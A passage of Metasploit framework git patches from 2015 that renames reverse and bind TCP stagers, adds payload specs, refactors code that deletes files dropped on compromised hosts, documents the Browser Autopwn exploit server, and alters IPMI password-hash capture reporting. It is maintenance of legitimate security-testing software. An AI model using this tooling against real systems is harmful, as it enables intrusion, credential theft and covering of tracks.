@@ -21,8 +21,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Windows x86 Bind TCP Stager, sending UUID',
-      'Description' => 'Listen for a connection, send UUID (Windows x86)',
+      'Name'        => 'Bind TCP Stager with UUID Support (Windows x86)',
+      'Description' => 'Listen for a connection with UUID Support (Windows x86)',
       'Author'      => ['OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
index a1d7afa7f3..f0617111d1 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -21,8 +21,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Reverse TCP Stager with UUID support',
-      'Description' => 'Connect back to the attacker, send UUID first',
+      'Name'        => 'Reverse TCP Stager with UUID Support',
+      'Description' => 'Connect back to the attacker with UUID Support',
       'Author'      => ['OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
index 968dcd0370..ee698c5933 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Windows x64 Bind TCP Stager, sending UUID',
-      'Description' => 'Listen for a connection, send UUID (Windows x64)',
+      'Name'        => 'Bind TCP Stager with UUID Support (Windows x64)',
+      'Description' => 'Listen for a connection with UUID Support (Windows x64)',
       'Author'      => [ 'sf' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
index 5c03b40aa8..a71fa5be83 100644
--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Windows x64 Reverse TCP Stager with UUID support',
-      'Description' => 'Connect back to the attacker, send UUID first (Windows x64)',
+      'Name'        => 'Reverse TCP Stager with UUID Support (Windows x64)',
+      'Description' => 'Connect back to the attacker with UUID Support (Windows x64)',
       'Author'      => ['OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',

From 820727e24d8a9fdc2d9af8b58afcb25a177e99c4 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 22:21:08 +1000
Subject: [PATCH 0118/1013] Add missing payloads to spec

---
 spec/modules/payloads_spec.rb | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 493bd720cc..0348f2e3a4 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2044,6 +2044,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'php/meterpreter/bind_tcp'
   end
 
+  context 'php/meterpreter/bind_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/php/bind_tcp_uuid',
+                              'stages/php/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'php/meterpreter/bind_tcp_uuid'
+  end
+
   context 'php/meterpreter/bind_tcp_ipv6' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2055,6 +2066,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'php/meterpreter/bind_tcp_ipv6'
   end
 
+  context 'php/meterpreter/bind_tcp_ipv6_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/php/bind_tcp_ipv6_uuid',
+                              'stages/php/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'php/meterpreter/bind_tcp_ipv6_uuid'
+  end
+
   context 'php/meterpreter/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2066,6 +2088,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'php/meterpreter/reverse_tcp'
   end
 
+  context 'php/meterpreter/reverse_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/php/reverse_tcp_uuid',
+                              'stages/php/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'php/meterpreter/reverse_tcp_uuid'
+  end
+
   context 'php/meterpreter_reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From 129ed7fb7ae9c1eed9cd8ee8acb9bfa427da7e65 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 May 2015 10:27:04 -0500
Subject: [PATCH 0119/1013] Add yard documentation

---
 lib/msf/core/exploit/file_dropper.rb | 122 +++++++++++++++++----------
 1 file changed, 76 insertions(+), 46 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index 49a7d49e43..66db5bf738 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -14,52 +14,22 @@ module Exploit::FileDropper
       ], self.class)
   end
 
-  #
   # When a new session is created, attempt to delete any files that the
   # exploit created.
   #
   # @param (see Msf::Exploit#on_new_session)
   # @return [void]
-  #
   def on_new_session(session)
     super
 
     print_status("new session...")
+    puts "#{self.session}"
+    if self.payload
+      puts "#{self.payload.session}"
+    end
     on_new_session_job(session)
   end
 
-  def on_new_session_job(new_session)
-    if session
-      session_orig = session
-    end
-
-    self.session = new_session
-
-    if session.type == 'meterpreter'
-      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
-    end
-
-    if not @dropped_files or @dropped_files.empty?
-      return true
-    end
-
-    @dropped_files.delete_if do |file|
-      puts "Deleting #{file}"
-      exists_before = file_dropper_check_file(file)
-      if file_dropper_delete(file)
-        file_dropper_deleted?(file, exists_before)
-      else
-        false
-      end
-    end
-
-    if session_orig
-      self.session = session_orig
-    else
-      self.session = nil
-    end
-  end
-
   #
   # Record file as needing to be cleaned up
   #
@@ -123,10 +93,76 @@ module Exploit::FileDropper
 
   private
 
+  # Takes a new session and makes the drop files task
+  #
+  # @param (see Msf::Exploit#on_new_session)
+  # @return [void]
+  # @note This methods needs to overwrite *and restore* the original
+  # `session` attribute
+  def on_new_session_job(new_session)
+    session_orig = session
+    self.session = new_session
+
+    begin
+      file_dropper_delete_files
+    ensure
+      self.session = session_orig
+    end
+  end
+
+  # Uses the exploit `session` to delete files on the `dropped_files` list
+  #
+  # @return [void]
+  def file_dropper_delete_files
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+    end
+
+    unless @dropped_files && @dropped_files.length > 0
+      return
+    end
+
+    @dropped_files.delete_if do |file|
+      puts "Deleting #{file}"
+      exists_before = file_dropper_check_file(file)
+      if file_dropper_delete(file)
+        file_dropper_deleted?(file, exists_before)
+      else
+        false
+      end
+    end
+  end
+
+  # Check if a file exists in the `session` file system
+  #
+  # @param [String] file The file to check
+  # @return [TrueClass] If the file exists
+  # @return [FalseClass] If the file doesn't exist
+  def file_dropper_check_file(file)
+    puts "Checking file... #{file}"
+    if session.platform =~ /win/
+      normalized = file_dropper_win_file(file)
+    else
+      normalized = file
+    end
+
+    puts "Checking normalized file... #{file}"
+    Msf::Post::File.file_exist?(normalized)
+  end
+
+  # Converts a file path to use the windows separator '\'
+  #
+  # @param [String] file The file path to convert
+  # @return [String] The file path converted
   def file_dropper_win_file(file)
     file.gsub('/', "\\\\")
   end
 
+  # Sends a file deletion command to the remote `session`
+  #
+  # @param [String] file The file to delete
+  # @return [TrueClass] If the delete command has been executed in the remote machine
+  # @return [FalseClass] Otherwise
   def file_dropper_delete(file)
     puts "Deleting #{file}"
     win_file = file_dropper_win_file(file)
@@ -162,18 +198,12 @@ module Exploit::FileDropper
     end
   end
 
-  def file_dropper_check_file(file)
-    puts "Checking file... #{file}"
-    if session.platform =~ /win/
-      normalized = file_dropper_win_file(file)
-    else
-      normalized = file
-    end
-
-    puts "Checking normalized file... #{file}"
-    Msf::Post::File.file_exist?(normalized)
-  end
-
+  # Checks if a file has been deleted by the current job
+  #
+  # @param [String] file The file to check
+  # @param [TrueClass] exists_before Indicates if the file existed before the cleanup job
+  # @return [TrueClass] if the file has been deleted or it cannot resolve
+  # @return [FalseClass] if the file hasn't been deleted
   def file_dropper_deleted?(file, exists_before)
     puts "Deleted? ... #{file}"
     if exists_before  && file_dropper_check_file(file)

From ea8e62f0fb3ae8b44c36ccab08c957d8d08be5bb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 May 2015 14:13:12 -0500
Subject: [PATCH 0120/1013] Add #file_dropper_file_exist?

---
 lib/msf/core/exploit/file_dropper.rb | 148 ++++++++++++---------------
 1 file changed, 63 insertions(+), 85 deletions(-)

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
index 66db5bf738..6fe6439c1f 100644
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,8 +3,6 @@
 module Msf
 module Exploit::FileDropper
 
-  attr_accessor :session
-
   def initialize(info = {})
     super
 
@@ -14,23 +12,6 @@ module Exploit::FileDropper
       ], self.class)
   end
 
-  # When a new session is created, attempt to delete any files that the
-  # exploit created.
-  #
-  # @param (see Msf::Exploit#on_new_session)
-  # @return [void]
-  def on_new_session(session)
-    super
-
-    print_status("new session...")
-    puts "#{self.session}"
-    if self.payload
-      puts "#{self.payload.session}"
-    end
-    on_new_session_job(session)
-  end
-
-  #
   # Record file as needing to be cleaned up
   #
   # @param files [Array<String>] List of paths on the target that should
@@ -49,7 +30,32 @@ module Exploit::FileDropper
   # Singular version
   alias register_file_for_cleanup register_files_for_cleanup
 
+  # When a new session is created, attempt to delete any files that the
+  # exploit created.
   #
+  # @param (see Msf::Exploit#on_new_session)
+  # @return [void]
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+    end
+
+    unless @dropped_files && @dropped_files.length > 0
+      return
+    end
+
+    @dropped_files.delete_if do |file|
+      exists_before = file_dropper_file_exist?(session, file)
+      if file_dropper_delete(session, file)
+        file_dropper_deleted?(session, file, exists_before)
+      else
+        false
+      end
+    end
+  end
+
   # While the exploit cleanup do a last attempt to delete any files created
   # if there is a file_rm method available. Warn the user if any files were
   # not cleaned up.
@@ -93,78 +99,44 @@ module Exploit::FileDropper
 
   private
 
-  # Takes a new session and makes the drop files task
+  # See if +path+ exists on the remote system and is a regular file
   #
-  # @param (see Msf::Exploit#on_new_session)
-  # @return [void]
-  # @note This methods needs to overwrite *and restore* the original
-  # `session` attribute
-  def on_new_session_job(new_session)
-    session_orig = session
-    self.session = new_session
-
-    begin
-      file_dropper_delete_files
-    ensure
-      self.session = session_orig
-    end
-  end
-
-  # Uses the exploit `session` to delete files on the `dropped_files` list
-  #
-  # @return [void]
-  def file_dropper_delete_files
-    if session.type == 'meterpreter'
-      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
-    end
-
-    unless @dropped_files && @dropped_files.length > 0
-      return
-    end
-
-    @dropped_files.delete_if do |file|
-      puts "Deleting #{file}"
-      exists_before = file_dropper_check_file(file)
-      if file_dropper_delete(file)
-        file_dropper_deleted?(file, exists_before)
-      else
-        false
-      end
-    end
-  end
-
-  # Check if a file exists in the `session` file system
-  #
-  # @param [String] file The file to check
+  # @param path [String] Remote filename to check
   # @return [TrueClass] If the file exists
   # @return [FalseClass] If the file doesn't exist
-  def file_dropper_check_file(file)
-    puts "Checking file... #{file}"
+  def file_dropper_file_exist?(session, path)
     if session.platform =~ /win/
-      normalized = file_dropper_win_file(file)
+      normalized = file_dropper_win_file(path)
     else
-      normalized = file
+      normalized = path
     end
 
-    puts "Checking normalized file... #{file}"
-    Msf::Post::File.file_exist?(normalized)
+    if session.type == 'meterpreter'
+      stat = session.fs.file.stat(normalized) rescue nil
+      return false unless stat
+      stat.file?
+    else
+      if session.platform =~ /win/
+        f = shell_command_token("cmd.exe /C IF exist \"#{normalized}\" ( echo true )")
+        if f =~ /true/
+          f = shell_command_token("cmd.exe /C IF exist \"#{normalized}\\\\\" ( echo false ) ELSE ( echo true )")
+        end
+      else
+        f = session.shell_command_token("test -f \"#{normalized}\" && echo true")
+      end
+
+      return false if f.nil? || f.empty?
+      return false unless f =~ /true/
+      true
+    end
   end
 
-  # Converts a file path to use the windows separator '\'
-  #
-  # @param [String] file The file path to convert
-  # @return [String] The file path converted
-  def file_dropper_win_file(file)
-    file.gsub('/', "\\\\")
-  end
-
-  # Sends a file deletion command to the remote `session`
+  # Sends a file deletion command to the remote +session+
   #
   # @param [String] file The file to delete
-  # @return [TrueClass] If the delete command has been executed in the remote machine
-  # @return [FalseClass] Otherwise
-  def file_dropper_delete(file)
-    puts "Deleting #{file}"
+  # @return [TrueClass] the delete command has been executed in the remote machine
+  # @return [FalseClass] otherwise
+  def file_dropper_delete(session, file)
     win_file = file_dropper_win_file(file)
 
     if session.type == 'meterpreter'
@@ -181,7 +153,6 @@ module Exploit::FileDropper
         false
       end
     else
-      puts "Deleting with shell"
       win_cmds = [
         %Q|attrib.exe -r "#{win_file}"|,
         %Q|del.exe /f /q "#{win_file}"|
@@ -201,12 +172,11 @@ module Exploit::FileDropper
   # Checks if a file has been deleted by the current job
   #
   # @param [String] file The file to check
-  # @param [TrueClass] exists_before Indicates if the file existed before the cleanup job
+  # @param [TrueClass] exists_before Indicates if the file existed before the deletion
   # @return [TrueClass] if the file has been deleted or it cannot resolve
   # @return [FalseClass] if the file hasn't been deleted
-  def file_dropper_deleted?(file, exists_before)
-    puts "Deleted? ... #{file}"
-    if exists_before  && file_dropper_check_file(file)
+  def file_dropper_deleted?(session, file, exists_before)
+    if exists_before  && file_dropper_file_exist?(session, file)
       print_error("Unable to delete #{file}")
       false
     elsif exists_before
@@ -218,5 +188,13 @@ module Exploit::FileDropper
     end
   end
 
+  # Converts a file path to use the windows separator '\'
+  #
+  # @param [String] file The file path to convert
+  # @return [String] The file path converted
+  def file_dropper_win_file(file)
+    file.gsub('/', '\\\\')
+  end
+
 end
 end

From 89be3fc1f2a7fe7e9142ff8632b004b577c7785e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 18 May 2015 16:27:18 -0500
Subject: [PATCH 0121/1013] Do global requirement comparison in BAP

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 28 +++++++++++++++++++++--
 modules/exploits/multi/browser/autopwn.rb |  5 +++-
 2 files changed, 30 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index fb00f10982..1fa10b5ea8 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -488,14 +488,38 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     # @return [Array]
     def get_suitable_exploits(cli, request)
-      current_exploit_list = bap_exploits.dup
+      current_exploit_list = []
       tag = retrieve_tag(cli, request)
       profile_info = get_profile_info(tag)
-      #$stderr.puts profile_info.inspect
+      bap_exploits.each do |m|
+        if m.get_bad_requirements(profile_info).empty?
+          current_exploit_list << m
+        end
+      end
+
+      if datastore['RealList']
+        show_real_list(cli.peerhost, tag, current_exploit_list)
+      end
+
       current_exploit_list
     end
 
 
+    def show_real_list(ip, tag, current_exploit_list)
+      order = 1
+      table = Rex::Ui::Text::Table.new(
+        'Header'  => '',
+        'Indent'  => 1,
+        'Columns' => ['Order', 'IP', 'Exploit']
+      )
+      current_exploit_list.each do |m|
+        table << [order, ip, m.shortname]
+        order += 1
+      end
+      print_status("Exploits found suitable for #{cli.peerhost} (Tag: #{tag})#{table}")
+    end
+
+
     # Returns a list of exploit URLs.
     #
     # @param cli [Socket] Socket for the browser
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index a3b666a4dc..f0ab961770 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -25,11 +25,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        => [ [ 'Automatic', {} ] ],
       'DefaultTarget'  => 0))
 
+
     register_advanced_options(get_advanced_options, self.class)
 
     register_options(
       [
-        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer']),
+        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection'], 'WebServer']),
         OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
         OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
         OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),
@@ -56,6 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
       opts << OptInt.new("PAYLOAD_#{platform.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info['lport']])
     end
 
+    opts << OptBool.new("RealList", [true, "Show which exploits will actually be served to each client", false])
+
     opts
   end
 

From fbbd25f4bc0558916904044308d5949bb190dd8a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 18 May 2015 17:56:17 -0500
Subject: [PATCH 0122/1013] I never use this thing

---
 lib/msf/core/exploit/browserautopwnv2.rb | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 1fa10b5ea8..c8aa26e917 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -1,6 +1,8 @@
 ###
 #
-# The Msf::Exploit::Remote::BrowserAutopwnv2 mixin is a replacement for the current BrowserAutoPwn
+# The Msf::Exploit::Remote::BrowserAutopwnv2 mixin is a replacement for the current BrowserAutoPwn.
+# It works with other components such as BrowserExploitServer, BrowserProfileManager, and BES-based
+# exploits to perform a faster and smarter automated client-side attack.
 #
 ###
 
@@ -9,9 +11,6 @@ require 'Date'
 module Msf
   module Exploit::Remote::BrowserAutopwnv2
 
-    # Exception specific for Msf::Exploit::Remote::BrowserAutopwnv2
-    class BAPv2Exception < RuntimeError; end
-
     include Msf::Exploit::Remote::BrowserExploitServer
 
     # @return [Array] A list of initialized BAP exploits

From 46f389fecde0eb8546ec39e667f89babef12f2d0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 18 May 2015 18:41:37 -0500
Subject: [PATCH 0123/1013] Documentation

---
 lib/msf/core/exploit/browserautopwnv2.rb | 87 +++++++++++++++++-------
 1 file changed, 61 insertions(+), 26 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index c8aa26e917..cb9037274e 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -22,7 +22,7 @@ module Msf
 
     # The default platform-specific payloads and preferred LPORTS.
     # The hash key is the name of the platform that matches what's on the module.
-    # The loader order is specific.
+    # The loader order is specific while starting them up.
     DEFAULT_PAYLOADS = {
       'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4449 },
       'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4448 },
@@ -35,7 +35,7 @@ module Msf
 
 
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
-    # the exploits from the framework object.
+    # the exploits from the framework object. All the usable exploits will be stored in #bap_exploits.
     #
     # @return [void]
     def init_exploits
@@ -60,9 +60,12 @@ module Msf
     end
 
 
-    # Returns a note type that's unique to this BAP.
+    # Returns a note type that's unique to this BAP (based on a timestamp).
     # This overrides Msf::Exploit::Remote::BrowserProfileManager#note_type_prefix so that BAP
-    # and all of its child exploits can share target information with each other.
+    # and all of its child exploits can share target information with each other. If BAP is active
+    # but there are other standalone BES exploits running, this allows them not to use (or cleanup)
+    # each other's data. Also, once requested, the method will not generate another note type prefix
+    # again, it will just return whatever's been stored in the @note_type_prefix instance variable.
     #
     # @return [String]
     def note_type_prefix
@@ -70,7 +73,8 @@ module Msf
     end
 
 
-    # Removes target information owned by this BAP.
+    # Removes target information from the framework database owned by this BAP.
+    # If the user is not connected to the database, then no cleanup action.
     #
     # @return [void]
     def rm_target_info_notes
@@ -83,18 +87,20 @@ module Msf
     end
 
 
-    # Removes jobs (exploits and payload handlers) that belong to BAP.
+    # Removes background jobs (exploits and payload handlers) that belong to BAP.
     #
     # @return [void]
     def rm_jobs
       module_job_ids.each do |id|
-        framework.jobs.stop_job(id)  if framework.jobs[id.to_s]
+        framework.jobs.stop_job(id) if framework.jobs[id.to_s]
       end
     end
 
 
-    # Cleans up everything.
+    # Cleans up everything such as notes and jobs.
     #
+    # @see #rm_jobs The method for cleaning up jobs.
+    # @see #rm_target_info_notes The method for removing target information (found in db notes).
     # @return [void]
     def cleanup
       rm_target_info_notes
@@ -102,7 +108,8 @@ module Msf
     end
 
 
-    # Modifies an exploit's default datastore options.
+    # Modifies an exploit's default datastore options. Some of them are user-configurable,
+    # some must be defined by BAP.
     #
     # @return [void]
     def set_exploit_options(xploit)
@@ -160,12 +167,18 @@ module Msf
 
 
     # Modifies @bap_exploits by sorting. The newest and with the highest ranking goes on top.
+    # This method is part of what makes BAP smarter. However, the list rearranged by this exploit
+    # will not actually be the same exploit list served to every client. When a client a request,
+    # #get_suitable_exploits will generate another list that will actually be used by the client
+    # by going through what we have here, and filter out all the exploit modules that don't match
+    # the target's requirements.
     #
     # @see #bap_exploits The read-only attribute.
     # @see #sort_date_in_group The method for sorting by disclosure date
     # @see #sort_group_by_rank The method for sorting by rank
     # @see #sort_bap_modules The method for breaking the module list into groups
     # @see #finalize_sorted_modules The method for finalizing bap_exploits
+    # @see #get_suitable_exploits
     # @return [void]
     def sort_bap_exploits
       bap_groups = group_bap_modules
@@ -177,7 +190,7 @@ module Msf
 
     # Sorts a grouped module list by disclosure date.
     #
-    # @param [Hash] A grouped module list.
+    # @param [Hash] bap_groups A grouped module list.
     # @return [Hash] A hash with each module list sorted by disclosure date.
     def sort_date_in_group(bap_groups)
       bap_groups.each_pair do |ranking, module_list|
@@ -188,7 +201,7 @@ module Msf
 
     # Sorts a module list by ranking.
     #
-    # @param [Hash] A grouped module list.
+    # @param [Hash] bap_groups A grouped module list.
     # @return [Hash] A hash grouped by ranking.
     def sort_group_by_rank(bap_groups)
       Hash[bap_groups.sort_by {|k,v| k}.reverse]
@@ -197,6 +210,7 @@ module Msf
 
     # Breaks @bap_exploits into groups for sorting purposes.
     #
+    # @see #bap_exploits
     # @return [Hash] A module list grouped by rank.
     def group_bap_modules
       bap_groups = {}
@@ -214,7 +228,7 @@ module Msf
     # Modifies @bap_exploit by replacing it with the rearranged module list.
     #
     # @see #bap_exploits The read-only attribute.
-    # @param [Hash] A grouped module list.
+    # @param [Hash] bap_groups A grouped module list.
     # @return [void]
     def finalize_sorted_modules(bap_groups)
       @bap_exploits = []
@@ -227,11 +241,13 @@ module Msf
     end
 
 
-    # Verifies with current active modules and see if the payload is wanted.
+    # Verifies with current active modules and see if the payload is wanted. For example: if only
+    # Windows exploits are being loaded, then there's no point to load payload handlers for Java,
+    # Linux and other ones.
     #
     # @param [String] payload_name The payload module path (name).
-    # @return [TrueClass]
-    # @return [FalseClass]
+    # @return [TrueClass] Payload is wanted.
+    # @return [FalseClass] Payload is not wanted.
     def is_payload_handler_wanted?(payload_name)
       bap_exploits.each do |m|
         return true if m.datastore['PAYLOAD'] == payload_name
@@ -243,8 +259,9 @@ module Msf
 
     # Returns a payload name. Either this will be the user's choice, or falls back to a default one.
     #
-    # @param [String] platform
-    # @return [String]
+    # @see DEFAULT_PAYLOADS The default settings.
+    # @param [String] platform Platform name.
+    # @return [String] Payload name.
     def get_selected_payload_name(platform)
       payload_name = datastore["PAYLOAD_#{platform.upcase}"]
 
@@ -270,7 +287,8 @@ module Msf
     end
 
 
-    # Returns the selected payload's LHOST.
+    # Returns the selected payload's LHOST. If no LHOST is set by the user (via the datastore option),
+    # then the method automatically generates one by Rex.
     #
     # @return [String]
     def get_payload_lhost
@@ -278,8 +296,11 @@ module Msf
     end
 
 
-    # Creates payload listeners.
+    # Creates payload listeners. The active job IDs will be tracked in #module_job_ids so that
+    # we know how to find them and then clean them up.
     #
+    # @note FireFox payload is skipped because there's no handler for it.
+    # @see #module_job_ids
     # @return [void]
     def start_payload_listeners
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
@@ -331,7 +352,7 @@ module Msf
 
     # Returns the selected payload.
     #
-    # @param [Object] A module that's been initialized.
+    # @param [Object] m A module that's been initialized.
     # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'
     def select_payload(m)
       selected_payload = DEFAULT_PAYLOADS['generic']
@@ -390,7 +411,8 @@ module Msf
     end
 
 
-    # Prints all the exploits that BAP will consider using.
+    # Prints all the exploits that BAP will consider using. But this isn't the actual list of
+    # exploits that BAP will use for each target.
     #
     # @return [void]
     def show_ready_exploits
@@ -480,8 +502,14 @@ module Msf
     end
 
 
-    # Returns a list of suitable exploits for the current client. It will do a global exploitable
-    # requirement check.
+    # Returns a list of suitable exploits for the current client based on what #sort_bap_exploits
+    # gives us. It will do a global exploitable requirement check (the best it can do). There's
+    # actually a target-specific exploitable requirement check too, but that is performed in
+    # BrowserExploitServer while the exploit is being served. In other words, it is possible
+    # #get_suitable_exploits might not be 100% accurate (but pretty good, it depends on how the
+    # exploit dev accurately defines his/her global requirements), but the exploit always has a
+    # choice to bail at the last second if it decides it is actually not suitable for the client.
+    # That way we don't risk being too wreckless with our attack.
     #
     # @param cli [Socket] Socket for the browser
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
@@ -504,6 +532,11 @@ module Msf
     end
 
 
+    # Prints a list of suitable exploits for the current list.
+    #
+    # @see #sort_bap_exploits Explains how the exploit list is generated at first.
+    # @see #get_suitable_exploits Explains how we serve exploits to each client.
+    # @return [void]
     def show_real_list(ip, tag, current_exploit_list)
       order = 1
       table = Rex::Ui::Text::Table.new(
@@ -519,8 +552,10 @@ module Msf
     end
 
 
-    # Returns a list of exploit URLs.
+    # Returns a list of exploit URLs. This is used by #build_html so the client can load our
+    # exploits one by one.
     #
+    # @see #build_html
     # @param cli [Socket] Socket for the browser
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     # @return [Array]
@@ -542,11 +577,11 @@ module Msf
     end
 
 
-    # Returns the HTML that the client will get.
+    # Returns the HTML that serves our exploits.
     #
     # @param cli [Socket] Socket for the browser
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
-    # @return [String]
+    # @return [String] HTML
     def build_html(cli, request)
       js = %Q|
       var currentIndex = 0;

From c6fcb9c6c530b97ad6ca8ed2ac3416e6e3f8b24a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 May 2015 19:39:03 -0500
Subject: [PATCH 0124/1013] Report credentials with create_credential_login

---
 .../auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 73 ++++++++++++-------
 1 file changed, 48 insertions(+), 25 deletions(-)

diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
index 2027a5547f..26f85371ce 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -71,7 +71,6 @@ class Metasploit3 < Msf::Auxiliary
     passwords << ""
     passwords = passwords.uniq
 
-
     self.udp_sock = Rex::Socket::Udp.create({'Context' => {'Msf' => framework, 'MsfExploit' => self}})
     add_socket(self.udp_sock)
 
@@ -180,18 +179,8 @@ class Metasploit3 < Msf::Auxiliary
       write_output_files(rhost, username, sha1_salt, sha1_hash)
 
       # Write the rakp hash to the database
-      report_auth_info(
-        :host	=> rhost,
-        :port   => rport,
-        :proto  => 'udp',
-        :sname	=> 'ipmi',
-        :user 	=> username,
-        :pass   => "#{sha1_salt}:#{sha1_hash}",
-        :source_type => "captured",
-        :active => true,
-        :type   => 'rakp_hmac_sha1_hash'
-      )
-
+      hash = "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}"
+      report_hash(user, hash)
       # Write the vulnerability to the database
       unless reported_vuln
         report_vuln(
@@ -216,17 +205,7 @@ class Metasploit3 < Msf::Auxiliary
         print_good("#{rhost}:#{rport} - IPMI - Hash for user '#{username}' matches password '#{pass}'")
 
         # Report the clear-text credential to the database
-        report_auth_info(
-          :host	=> rhost,
-          :port   => rport,
-          :proto  => 'udp',
-          :sname	=> 'ipmi',
-          :user 	=> username,
-          :pass   => pass,
-          :source_type => "cracked",
-          :active => true,
-          :type   => 'password'
-        )
+        report_cracked_cred(username, pass)
